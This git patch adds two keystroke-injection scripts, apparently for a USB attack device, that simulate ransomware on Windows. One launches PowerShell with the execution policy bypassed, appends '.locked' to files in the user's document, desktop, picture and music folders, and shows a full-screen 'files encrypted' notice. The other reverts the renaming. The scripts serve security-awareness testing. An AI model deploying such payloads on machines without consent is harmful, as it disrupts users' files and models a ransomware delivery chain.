From 75d74058f626227fa476c6be1cce993aa9d83215 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Sat, 18 May 2024 12:06:50 -0400
Subject: [PATCH] Create RansomwareTest

---
 RansomwareTest | 69 ++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 69 insertions(+)
 create mode 100644 RansomwareTest

diff --git a/RansomwareTest b/RansomwareTest
new file mode 100644
index 0000000..610151e
--- /dev/null
+++ b/RansomwareTest
@@ -0,0 +1,69 @@
+# Main
+REM This script was created by github.com/MarkCyber
+REM This script is intended to act as a simulation of a ransomware attack
+REM This script will change all file extensions to .locked rather than encrypting the files
+REM This script will also display a simulated encrypted message
+
+DELAY 1000
+GUI r
+DELAY 1000
+STRING powershell -NoProfile -ExecutionPolicy Bypass -Command "
+$locations = @('MyDocuments', 'Desktop', 'Pictures', 'Music');
+$errorOccurred = $false;
+foreach ($loc in $locations) {
+    $path = [Environment]::GetFolderPath($loc);
+    $files = Get-ChildItem -Path $path -File;
+    foreach ($file in $files) {
+        try {
+            Rename-Item -Path $file.FullName -NewName ($file.Name + '.locked');
+        } catch {
+            $errorOccurred = $true;
+        }
+    }
+}
+if ($errorOccurred) {
+    Write-Host 'An error occurred while renaming files';
+}
+Add-Type -AssemblyName PresentationFramework;
+$Window = New-Object System.Windows.Window;
+$Window.WindowStartupLocation = 'CenterScreen';
+$Window.WindowState = 'Maximized';
+$Window.Topmost = $true;
+$Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.';
+$Window.ShowDialog();
+"
+ENTER
+DELAY 1000
+
+STRING exit
+ENTER
+
+
+
+
+
+
+
+# Cleanup
+REM This script was created by github.com/MarkCyber
+REM This is a follow-up script to the RansomwareSimulation
+REM This script is to revert all changes from the RansomwareSimulation script
+
+DELAY 1000
+GUI r
+DELAY 2000
+STRING powershell -NoProfile -ExecutionPolicy Bypass -Command "
+$locations = @('MyDocuments', 'Desktop', 'Pictures', 'Music');
+foreach ($loc in $locations) {
+    $path = [Environment]::GetFolderPath($loc);
+    $files = Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') };
+    foreach ($file in $files) {
+        Rename-Item -Path $file.FullName -NewName ($file.Name -replace '\.locked$', '');
+    }
+}
+"
+ENTER
+DELAY 1000
+
+STRING exit
+ENTER